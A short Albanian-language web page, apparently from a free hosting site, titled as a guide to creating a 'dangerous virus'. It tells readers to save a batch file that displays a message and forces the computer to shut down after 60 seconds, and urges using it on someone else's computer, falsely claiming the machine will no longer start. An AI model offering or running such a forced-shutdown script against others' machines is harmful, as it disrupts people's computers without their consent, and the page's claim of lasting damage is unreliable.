Mire Se Vini
  Krijoo Virus Te Rrezikshem
 
1.Hapim Notepad
2.E Shkruajm Kete:

@echo
msg * System-Coder
shutdown -s -t 60 -c "System-Coder KHG"

3.Dhe E Ruajm SiTeDoni.bat

po menoj naj kujt ne kompjoter me ja ba jo ne te juvin se nuk qelet ma

 

 

 
  Today, there have been 3 visitors (106 hits) on this page!  
 
=> Do you also want a homepage for free? Then click here! <=